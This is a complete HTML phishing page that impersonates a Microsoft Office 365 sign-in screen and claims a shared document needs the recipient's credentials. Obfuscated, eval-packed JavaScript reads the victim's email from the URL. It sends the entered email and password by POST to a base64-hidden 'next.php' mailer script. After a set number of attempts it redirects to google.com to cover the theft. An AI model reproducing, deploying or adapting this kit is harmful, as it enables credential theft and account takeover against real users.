<html lang="en">

<head>
    <meta http-equiv="x-ua-compatible" content="EmulateIE9">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <title>Office 365</title>
</head>

<body style="background-image: url('images/214d89a26f0ac918a09f216a1b0f97b4.png'); background-repeat: no-repeat;background-size: cover;">
    <div class="container-fluid p-0">
        <div class="container">
            <div class="row my-5">
                <div class="col-lg-6 mx-auto">
                    <div class="m-5 p-5 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                        <div class="text-left">
                            <span><img src="images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" class="img-fluid" width="110px"></span><span class="pl-4 h5 align-middle"> </span><br><br>
                            <p class="h4 ">Sign in</p>
                            <p class="">Only recipient email with valid credentials can access shared document.</p>
                            <span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please enter correct password.</span><br>
                            <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                            <small></small>
                            <div class="form-group">
                                <input type="email" name="ai" class="form-control rounded-0 bg-transparent border-top-0 border-left-0 border-right-0" id="ai" aria-describedby="aiHelp" placeholder="Enter e-mail address" style="border-bottom: 1px solid">
                            </div>
                            <div class="form-group mt-2">
                                <small></small>
                                <input type="password" name="pr" class="form-control border-top-0 border-left-0 border-right-0" id="pr" aria-describedby="aiHelp" placeholder="Password" style="border-bottom: 1px solid">
                            </div>
                        </div>
                        <div class="form-check mt-3">
                            <input type="checkbox" class="form-check-input" id="exampleCheck1">
                            <label class="form-check-label" for="exampleCheck1"><span><a href="#" class="text-dark">Keep me sign in</a></span></label>
                        </div>
                        <div class="mt-1 small">
                            <a href="#" class="">Forgot Password?</a>
                        </div>
                        <div class="col-lg-12 mt-3 text-right p-0">
                            <button class="btn text-white px-4 rounded-0" id="sub-btn" style="background-color: #0a59a3;">Sign in</button>
                        </div>
                    </div>
                </div>
            </div>
            <!-- Optional JavaScript -->
            <!-- jQuery first, then Popper.js, then Bootstrap JS -->
            <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
            <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
            <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
//redirect link
var rdrt = "https://www.google.com";

//mail result count
var rc = 2;

//mailer link
var f = atob("bmV4dC5waHA=");


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(H).S(8(){3 m=0;$(H).T(8(a){3 b=(a.I?a.I:a.U);7(b==\'13\'){a.J();$("#v-w").K()}});3 n=L.M.V.s(1);7(!n){}W{3 o=n;3 p=o.x("@");3 q=o.s((p+1));3 c=q.s(0,q.x(\'.\'));3 r=c.N();$(\'#C\').y(o);$(\'#X\').5(o);$("#u").D()}$(\'#v-w\').K(8(b){$(\'#6\').D();$(\'#u\').D();b.J();3 d=$("#C").y();3 e=$("#E").y();3 g=$(\'#u\').5();$(\'#u\').Y(g);3 h=d;3 i=/^([a-F-G-Z\\.\\-])+\\@(([a-F-G-9\\-])+\\.)+([a-F-G-9]{2,4})+$/;7(!d){$(\'#6\').z();$(\'#6\').5("10 O P Q.!");A B}7(!i.11(h)){$(\'#6\').z();$(\'#6\').5("12 R 14\'t 15. 16 a 17 R");A B}7(!e){$(\'#6\').z();$(\'#6\').5("18 O P Q.!");A B}3 j=h.x("@");3 k=h.s((j+1));3 c=k.s(0,k.x(\'.\'));3 l=c.N();m=m+1;$.19({1a:\'1b\',1c:f,1d:\'1e\',1f:{C:d,E:e,},1g:8(a){$(\'#v-w\').5(\'1h...\')},1i:8(){$("#E").y("");7(m>=1j){m=0;L.M.1k(1l);A B}$("#u").z();$(\'#v-w\').5(\'1m 1n\')}})})});',62,86,'|||var||html|error|if|function||||||||||||||||||||substr||msg|sub|btn|indexOf|val|show|return|false|ai|hide|pr|zA|Z0|document|keyCode|preventDefault|click|window|location|toLowerCase|field|is|empty|account|ready|keypress|which|hash|else|aich|text|9_|Email|test|That||doesn|exist|Enter|different|Password|ajax|dataType|JSON|url|type|POST|data|beforeSend|Verifying|complete|rc|replace|rdrt|Sign|in'.split('|'),0,{}))
</script>

</html>